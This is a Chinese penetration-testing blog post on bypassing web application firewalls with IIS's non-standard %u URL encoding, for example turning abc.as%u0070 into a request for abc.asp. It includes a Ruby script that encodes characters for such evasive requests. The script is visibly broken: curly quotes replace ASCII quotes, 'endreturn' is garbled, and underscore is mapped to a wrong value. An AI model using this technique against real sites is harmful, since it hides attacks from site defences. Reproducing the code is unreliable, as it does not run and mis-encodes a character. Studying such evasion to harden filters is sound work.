您的位置 » 首页 » 渗透测试 » waf绕过:WAF绕过tips—%u encoding

waf绕过:WAF绕过tips—%u encoding

发表于5年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2012年12月12日 | 文章热度:2,848 次 全屏阅读

显示不全请点击全屏阅读

常用的URL编码有UTF(%xx%xx)和十六进制编码(%xx),大部分IDS和WAF都可以识别并解码,然后再做正则匹配。但是IIS web服务器除了支持这两种编码之外,还支持另外一种非标准的编码,也就是这里说的%u编码(%uxxxx)。更具体的内容可以查看原文。不得不说有些技术不会老,关键是你还在乎不。也就是说请求abc.as%u0070,实际上是请求的abc.asp。如果这样的话,在IIS的环境下就是一种绕过的方法,如果你的waf傻傻分不清楚的话。

下面是修改的一个ruby脚本,可以将字符转换为上面的%u编码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
require 'uri'
def unicode_url(string)
lookuptable = Hash.new
lookuptable ={
‘ ‘ => ‘%u0020’,
‘/’ => ‘%u002f’,
‘\\’ => ‘%u005c’,
“‘” => '%u0027',
‘”‘ => ‘%u0022’,
‘>’ => ‘%u003e’,
‘<‘ => ‘%u003c’,
‘#’ => ‘%u0023’,
‘!’ => ‘%u0021’,
‘$’ => ‘%u0024’,
‘*’ => ‘%u002a’,
‘@’ => ‘%u0040’,
‘.’ => ‘%u002e’,
‘_’ => ‘%u0095’,
‘(‘ => ‘%u0028’,
‘)’ => ‘%u0029’,
‘,’ => ‘%u002c’,
‘%’ => ‘%u0025’,
‘-‘ => ‘%u002d’,
‘;’ => ‘%u003b’,
‘:’ => ‘%u003a’,
‘|’ => ‘%u007c’,
‘&’ => ‘%u0026’,
‘+’ => ‘%u002b’,
‘=’ => ‘%u003d’,
‘a’ => ‘%u0061’,
‘A’ => ‘%u0041’,
‘b’ => ‘%u0062’,
‘B’ => ‘%u0042’,
‘c’ => ‘%u0063’,
‘C’ => ‘%u0043’,
‘d’ => ‘%u0064’,
‘D’ => ‘%u0044’,
‘e’ => ‘%u0065’,
‘E’ => ‘%u0045’,
‘f’ => ‘%u0066’,
‘F’ => ‘%u0046’,
‘g’ => ‘%u0067’,
‘G’ => ‘%u0047’,
‘h’ => ‘%u0068’,
‘H’ => ‘%u0048’,
‘i’ => ‘%u0069’,
‘I’ => ‘%u0049’,
‘j’ => ‘%u006a’,
‘J’ => ‘%u004a’,
‘k’ => ‘%u006b’,
‘K’ => ‘%u004b’,
‘l’ => ‘%u006c’,
‘L’ => ‘%u004c’,
‘m’ => ‘%u006d’,
‘M’ => ‘%u004d’,
‘n’ => ‘%u006e’,
‘N’ => ‘%u004e’,
‘o’ => ‘%u006f’,
‘O’ => ‘%u004f’,
‘p’ => ‘%u0070’,
‘P’ => ‘%u0050’,
‘q’ => ‘%u0071’,
‘Q’ => ‘%u0051’,
‘r’ => ‘%u0072’,
‘R’ => ‘%u0052’,
‘s’ => ‘%u0073’,
‘S’ => ‘%u0053’,
‘t’ => ‘%u0074’,
‘T’ => ‘%u0054’,
‘u’ => ‘%u0075’,
‘U’ => ‘%u0055’,
‘v’ => ‘%u0076’,
‘V’ => ‘%u0056’,
‘w’ => ‘%u0077’,
‘W’ => ‘%u0057’,
‘x’ => ‘%u0078’,
‘X’ => ‘%u0058’,
‘y’ => ‘%u0079’,
‘Y’ => ‘%u0059’,
‘z’ => ‘%u007a’,
‘Z’ => ‘%u005a’,
‘0’ => ‘%u0030’,
‘1’ => ‘%u0031’,
‘2’ => ‘%u0032’,
‘3’ => ‘%u0033’,
‘4’ => ‘%u0034’,
‘5’ => ‘%u0035’,
‘6’ => ‘%u0036’,
‘7’ => ‘%u0037’,
‘8’ => ‘%u0038’,
‘9’ => ‘%u0039’} # Convert string to array of chars
chararray = string.scan(/./)
newstr = String.new
chararray.each do |c|
if lookuptable.has_key? c
newstr = newstr + lookuptable[c]
else
newstr = newstr + URI.escape(c)
end
endreturn newstr
end

print “Enter string to URL Unicode:”
puts unicode_url(gets)

ps:  感觉编码在很多地方很强大,但是没掌握到其精髓,还处于模糊阶段

作者:qingsh4n

Tags:

waf绕过,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/1852/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)